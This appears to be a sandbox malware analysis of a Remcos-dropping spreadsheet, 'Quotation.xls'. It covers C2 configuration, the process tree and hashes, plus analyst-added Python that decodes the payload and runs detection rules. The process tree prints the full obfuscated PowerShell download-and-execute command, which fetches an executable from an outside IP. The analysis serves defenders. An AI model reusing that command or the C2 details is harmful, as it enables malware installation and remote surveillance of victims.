Analysis

  • max time kernel
    149s
  • max time network
    134s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
  • submitted
    24-07-2024 09:07

General

  • Target

    Quotation.xls

  • Size

    1.0MB

  • MD5

    7a9a6e2a484c942e9247513bf8420f13

  • SHA1

    9a0399a2c75537687cdcaa939adb4a871b56f26e

  • SHA256

    c0484101a8ad9d96190d39f100d6a6ed337873df68eb587c74a91b5cdd19cdd5

  • SHA512

    a48ad2da1dddb561a8a64414a8576e03180dccc65cedb94e4733c1d7dba3f8881230d6ec7bb10fe495e13e5fc7449585f52921f9d05d3d1f41361e0b99ec3d2c

  • SSDEEP

    24576:QCvOsc3umX8S4lMiK4uwQP6DdRgLd5+HKtGboP:QCG2xRISDdRgLQu

Malware Config

Extracted

Family

remcos

Botnet

2556

C2

bossnacarpet.com:2556

vegetachcnc.com:2556

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    chrome-6W1HCC

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance tool.

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Detected phishing page
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Quotation.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2848
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2628
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'JDVYWE5WZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRVJERUZpbml0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdLbU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFljSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1FpSEtBVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtGWmN1cW5tYWNILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYU3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeVVjSHZ3QnF1TWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNVhYTlZlOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDIzMDdXL2NzcnNzLmV4ZSIsIiRFTlY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1NUYXJULVNMZUVwKDMpO3NUQXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcd2luaXRpLmV4ZSI='+[chAR]0x22+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:588
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'JDVYWE5WZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRVJERUZpbml0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdLbU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFljSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1FpSEtBVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtGWmN1cW5tYWNILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYU3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeVVjSHZ3QnF1TWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNVhYTlZlOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDIzMDdXL2NzcnNzLmV4ZSIsIiRFTlY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1NUYXJULVNMZUVwKDMpO3NUQXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcd2luaXRpLmV4ZSI='+[chAR]0x22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:884
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l6tmq1s6.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1052
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D74.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6D73.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1876
        • C:\Users\Admin\AppData\Roaming\winiti.exe
          "C:\Users\Admin\AppData\Roaming\winiti.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:1968
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
            5⤵
            PID:2868
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
            5⤵
            PID:2864
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2928
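
The powershell.exe command line above (PID 884) is a two-stage download cradle. The outer one-liner rebuilds `::` and the double quote from `[char]` arithmetic so that `[System.Text.Encoding]::Utf8.GetString`, `FromBase64String` and the payload never appear as one contiguous string, then `iex` runs the decoded stage. The `-C DEViCECrEDEntIaldEPLOyment ;` prefix is what the "Evasion via Device Credential Deployment" signature refers to: DeviceCredentialDeployment.exe is a signed Windows binary catalogued by LOLBAS for hiding the calling console window; it is not shipped with Windows 7, so on this image the call fails and the rest of the line still runs. The script below is an added analyst helper, not part of the sandbox report or of the sample: it folds the `[char]` splicing, decodes the base64 and extracts the indicators from the result. Its only input is the command line copied verbatim from the tree; the decoded stage is an `Add-Type` P/Invoke of `urlmon!URLDownloadToFile` (which is why csc.exe and cvtres.exe appear as children of PowerShell) that fetches the second stage to `%APPDATA%\winiti.exe`, sleeps three seconds and starts it.

```python
import base64
import re

# powershell.exe command line (PID 884) copied verbatim from the process tree above.
CMDLINE = r'''PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'JDVYWE5WZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRVJERUZpbml0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdLbU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFljSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1FpSEtBVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtGWmN1cW5tYWNILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYU3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeVVjSHZ3QnF1TWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNVhYTlZlOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDIzMDdXL2NzcnNzLmV4ZSIsIiRFTlY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1NUYXJULVNMZUVwKDMpO3NUQXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcd2luaXRpLmV4ZSI='+[chAR]0x22+'))')))"'''

# One [char]N token (decimal or 0x-hex) and a run of them spliced between two
# single-quoted literals:  '...'+[char]58+[char]0x3a+'...'
CHAR_TOKEN = r"\[char\]\s*(0x[0-9a-f]+|\d+)"
CONCAT_RE = re.compile(r"'((?:\s*\+\s*" + CHAR_TOKEN + r")+)\s*\+\s*'", re.I)
B64_RE = re.compile(r'frombase64string\(\s*"([A-Za-z0-9+/=]+)"\s*\)', re.I)


def fold_char_concat(text: str) -> str:
    """Replace '+[char]X+[char]Y+' string splicing with the literal characters."""
    def join(m: re.Match) -> str:
        codes = re.findall(CHAR_TOKEN, m.group(1), re.I)
        return "".join(chr(int(c, 0)) for c in codes)
    return CONCAT_RE.sub(join, text)


def extract_stage2(cmdline: str) -> str:
    """Fold the obfuscation, pull the base64 literal and return the decoded
    script with its whitespace padding collapsed to single spaces."""
    folded = fold_char_concat(cmdline)
    m = B64_RE.search(folded)
    if not m:
        raise ValueError("no FromBase64String() literal found")
    script = base64.b64decode(m.group(1)).decode("utf-8")
    return re.sub(r"\s+", " ", script).strip()


def extract_iocs(script: str) -> dict:
    """Network and host indicators from the decoded download cradle."""
    urls = re.findall(r"https?://[^\s\"')]+", script)
    drops = {d.lower() for d in re.findall(r"\$env:appdata\\[\w.\-]+", script, re.I)}
    dll = re.search(r'dllimport\(\s*"([^"]+)"', script, re.I)
    api = re.search(r"extern\s+\w+\s+(\w+)\s*\(", script, re.I)
    sleep = re.search(r"start-sleep\s*\(\s*(\d+)\s*\)", script, re.I)
    return {
        "urls": urls,
        "drop_paths": sorted(drops),
        "import": f"{dll.group(1).lower()}!{api.group(1)}" if dll and api else None,
        "sleep_seconds": int(sleep.group(1)) if sleep else None,
    }


def analyse(cmdline: str) -> dict:
    """Full pipeline: the binary run before iex, the decoded stage and its IOCs."""
    pre = re.search(r"-c\s+(\w+)\s*;", cmdline, re.I)
    stage2 = extract_stage2(cmdline)
    result = {"pre_command": pre.group(1) if pre else None, "stage2": stage2}
    result.update(extract_iocs(stage2))
    return result


if __name__ == "__main__":
    for key, value in analyse(CMDLINE).items():
        print(f"{key}: {value}")
```

The same folding step handles any number of chained `[char]` tokens, so it also covers variants that splice longer keywords together; the IOC regexes are deliberately case-insensitive because every identifier in this sample uses randomised casing.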

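Two points in the process tree matter for detection. First, mshta.exe sits at depth 1 with `-Embedding`, meaning it was started by COM activation rather than as a direct child of EXCEL.EXE (the report does not show its parent), so a rule keyed on "Office process spawns script host" does not fire on this sample; the reliable signals are mshta.exe spawning cmd.exe or powershell.exe, the PowerShell switch and `[char]`/`FromBase64String` pattern, and powershell.exe spawning csc.exe for the `Add-Type` compile. Second, the dropped winiti.exe launches CasPol.exe, msbuild.exe and AddInProcess32.exe with no arguments, which together with the SetThreadContext and WriteProcessMemory signatures and the repeated 0x400000-0x482000 mappings in PID 2928 is consistent with process hollowing of .NET framework hosts. The Python below is an added example, not the sandbox's own detection logic: it runs these rules over Sysmon-style process-creation events reconstructed from the tree (PIDs, images and command lines as reported; the two roots get ppid 0 because their parents are not shown, and the base64 blob is shortened since no rule depends on it).

```python
import re

# Events reconstructed from the process tree above. Root parents are 0 because
# the report does not show them; the base64 payload is shortened in this sample.
PS_CMD = ("PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; "
          "IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng("
          "[sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+"
          "'JDVYWE5WZSAg'+[chAR]0x22+'))')))")
NET2 = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727"
NET4 = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319"
EVENTS = [
    dict(pid=2848, ppid=0, image=r"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE",
         cmdline=r'"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Quotation.xls'),
    dict(pid=2628, ppid=0, image=r"C:\Windows\SysWOW64\mshta.exe", cmdline=r"C:\Windows\SysWOW64\mshta.exe -Embedding"),
    dict(pid=588, ppid=2628, image=r"C:\Windows\SysWOW64\cmd.exe", cmdline='"C:\\Windows\\system32\\cmd.exe" "/c ' + PS_CMD + '"'),
    dict(pid=884, ppid=588, image=r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", cmdline=PS_CMD),
    dict(pid=1052, ppid=884, image=NET2 + r"\csc.exe",
         cmdline=f'"{NET2}\\csc.exe" /noconfig /fullpaths @"C:\\Users\\Admin\\AppData\\Local\\Temp\\l6tmq1s6.cmdline"'),
    dict(pid=1876, ppid=1052, image=NET2 + r"\cvtres.exe",
         cmdline=f'{NET2}\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\\Users\\Admin\\AppData\\Local\\Temp\\RES6D74.tmp" "c:\\Users\\Admin\\AppData\\Local\\Temp\\CSC6D73.tmp"'),
    dict(pid=1968, ppid=884, image=r"C:\Users\Admin\AppData\Roaming\winiti.exe", cmdline=r'"C:\Users\Admin\AppData\Roaming\winiti.exe"'),
    dict(pid=2868, ppid=1968, image=NET4 + r"\CasPol.exe", cmdline=f'"{NET4}\\CasPol.exe"'),
    dict(pid=2864, ppid=1968, image=NET4 + r"\msbuild.exe", cmdline=f'"{NET4}\\msbuild.exe"'),
    dict(pid=2928, ppid=1968, image=NET4 + r"\AddInProcess32.exe", cmdline=f'"{NET4}\\AddInProcess32.exe"'),
]

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}
# .NET framework binaries commonly started argument-less as hollowing targets.
DOTNET_HOSTS = {"caspol.exe", "msbuild.exe", "addinprocess32.exe", "addinprocess.exe", "regasm.exe", "regsvcs.exe"}
# One point per indicator; three or more is treated as an obfuscated cradle.
PS_INDICATORS = [
    r"-nop\b",                           # -NoProfile
    r"-w\s+1\b|-windowstyle\s+hidden",   # hidden window
    r"-e\w*\s+bypas",                    # -ExecutionPolicy Bypass, any abbreviation
    r"frombase64string",
    r"\[char\]\s*(?:0x[0-9a-f]+|\d+)",   # string splicing via [char]N
    r"\biex\b|invoke-expression",
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: list) -> list:
    """Run the parent/child and command-line rules; return (rule, pid) hits."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        child, cmd = basename(e["image"]), e["cmdline"]
        parent_ev = by_pid.get(e["ppid"])
        parent = basename(parent_ev["image"]) if parent_ev else None
        if parent in OFFICE and child in SCRIPT_HOSTS:
            hits.append(("office_spawns_script_host", e["pid"]))
        # COM-activated mshta (-Embedding) shows no Office parent in the tree.
        if child == "mshta.exe" and re.search(r"-embedding\b", cmd, re.I) and parent not in OFFICE:
            hits.append(("mshta_com_activation", e["pid"]))
        if parent == "mshta.exe" and child in {"cmd.exe", "powershell.exe"}:
            hits.append(("mshta_spawns_shell", e["pid"]))
        if child == "powershell.exe":
            score = sum(bool(re.search(p, cmd, re.I)) for p in PS_INDICATORS)
            if score >= 3:
                hits.append(("powershell_obfuscated_cradle", e["pid"]))
        if parent == "powershell.exe" and child == "csc.exe":
            hits.append(("powershell_addtype_compile", e["pid"]))
        # Binary under a user profile launching a .NET host with no arguments.
        if (parent_ev and re.search(r"\\appdata\\", parent_ev["image"], re.I)
                and child in DOTNET_HOSTS
                and cmd.strip().strip('"').lower() == e["image"].lower()):
            hits.append(("appdata_binary_spawns_dotnet_host", e["pid"]))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:36} pid={pid}")
```

Running it against the reconstructed events fires every rule except `office_spawns_script_host`, which is the point: in this chain the Excel-to-mshta link is only visible through COM activation, so the hunt has to start at mshta.exe and at the PowerShell command line rather than at the Office parent.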
      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2LF9I1AK\gdfc[1].hta

        Filesize

        12KB

        MD5

        a183dcd47ab3d4ad39338dfe7eddff53

        SHA1

        4cd5c2dad4510df9516f6d16208bd284add559b5

        SHA256

        85c14a84e7c4d9e2b2ef10bc483f9ae22cfdf3438a2ae818dc8f487a0e455682

        SHA512

        8818b4d8d9bcd37b3d717c6309e825142ea2fd9f0cab68f4ca5232f38e444c90abb75a35e069018cfed867d48f267369bdab67a681a36633e264338adc943791

      • C:\Users\Admin\AppData\Local\Temp\RES6D74.tmp

        Filesize

        1KB

        MD5

        cd9200e66a5fa073a5549f36efb35a50

        SHA1

        c5f1942415b254a8715c92888e19c4e2efbb689b

        SHA256

        beb64070aa5707651ed331e35b53cd295de898c0f547c28cbfe0155415a6a4dc

        SHA512

        0c9b6dd08ccf7524ed00f9ed2c871dd6a7ef36373c8d1603108dd60fd018237f57f7187561d3f36aa33664670993e70110f034c46617e702bd03720bca8212a0

      • C:\Users\Admin\AppData\Local\Temp\l6tmq1s6.dll

        Filesize

        3KB

        MD5

        958fc6d7cff611120a9297af43662996

        SHA1

        f4b17148eedad42cdf26a1ccd7dc17f252450c68

        SHA256

        aee5f00d12d42d731fa43cbd0c39f2fac387c18f51a9c0332c45a6612c447db3

        SHA512

        a203a478aba35b3cf441f0fad42f708c618965767be9d4dd88f8e5267412fd5e45b11ba118f21af2a786b1fd47e006dc180da71087a20b8f3c36dc360cdf9fd7

      • C:\Users\Admin\AppData\Local\Temp\l6tmq1s6.pdb

        Filesize

        7KB

        MD5

        e70684c20cbbb0ba7c7b8634a0727159

        SHA1

        14e5e9df9ad67a941cd7c0cd68f79f9d18d7b5ff

        SHA256

        ac4a8a14046d155b0a0bbcd1b0b19a7f79018d27c70e65957e768323a5db273d

        SHA512

        c2a4556f83a9fcae888b0fc67605ccd01919e6933626b26061e38b465d83519addb8fc9e4c72c5172a877a43bd76124fd86d80410b4dd5673190cd79df60dadb

      • C:\Users\Admin\AppData\Roaming\winiti.exe

        Filesize

        2.2MB

        MD5

        f6bf8ada032d17192526ffebb48aed79

        SHA1

        362cb802e430115288638c9d613f00412f1b2519

        SHA256

        153e11471f85de3df5135b0445014698333ff40a9d6c488d291d6517eb19800d

        SHA512

        0a2e5dbcc972d8463a3cd0608bb837e232ed1dd909ea7472ade269abb0ae1d9dfbeecefe505caffabefed02af413ee156aa2917f0ac3547f1431183bfa99639c

      • \??\c:\Users\Admin\AppData\Local\Temp\CSC6D73.tmp

        Filesize

        652B

        MD5

        010033bada91ce77a8eae6c96c8627d2

        SHA1

        ee31b5cf1b1974b77766e6b3bccd730524e18a18

        SHA256

        bf4cc1b4b2f823aac74d3b7e3922fbde66c73a56ecda14d7be050f23f0e2223c

        SHA512

        04c6d9269b2a42fb35f83e707839ea1a01f0946d51d9e2e5ee6db668994b4bf75d030207ce7e77eeccf7060d726a00f455339d0011d84a274e6b2889a0ce1f2d

      • \??\c:\Users\Admin\AppData\Local\Temp\l6tmq1s6.0.cs

        Filesize

        461B

        MD5

        a83dc0e46bbad233951be9e3fdba130c

        SHA1

        892cfc6827bb1072ec2e26bbf83457497d6a17cb

        SHA256

        aa9a30262c1a7f73a50a10094b1c5eef9584cd05d275b2ed57430b3431aef967

        SHA512

        e02ef7f32d36925b4064b283c5dfe49b2db6fe0df092be7e3e4b3ba6501b840f4d7d86732f63dc4564514e8aef810edc40b42c982b9fb8356b2e5ab6fe580caa

      • \??\c:\Users\Admin\AppData\Local\Temp\l6tmq1s6.cmdline

        Filesize

        309B

        MD5

        3fce564657419739a0491a5402a8c929

        SHA1

        f405e46f957bdf5d38b310fba68c8175c2acf36d

        SHA256

        47510126de9f30f68ac4fff997269741a20107c7e317800ab4b5e1e2c5688dca

        SHA512

        52b21784bf8520b7fa2e216cb3d925c5b0516c3c89bad08e17eba72ed63acdf655f1f88dd720ce8ab3b64dc0f28246c851bbda29aa16d603a76ae018aaa9c052

      • memory/2628-3-0x00000000022F0000-0x00000000022F2000-memory.dmp

        Filesize

        8KB

      • memory/2848-40-0x000000007292D000-0x0000000072938000-memory.dmp

        Filesize

        44KB

      • memory/2848-4-0x0000000002370000-0x0000000002372000-memory.dmp

        Filesize

        8KB

      • memory/2848-1-0x000000007292D000-0x0000000072938000-memory.dmp

        Filesize

        44KB

      • memory/2848-56-0x000000007292D000-0x0000000072938000-memory.dmp

        Filesize

        44KB

      • memory/2848-53-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB

      • memory/2848-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB

      • memory/2928-38-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-48-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-41-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-42-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-43-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-44-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-45-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-39-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-49-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-50-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-51-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-36-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-37-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-57-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-58-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-59-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB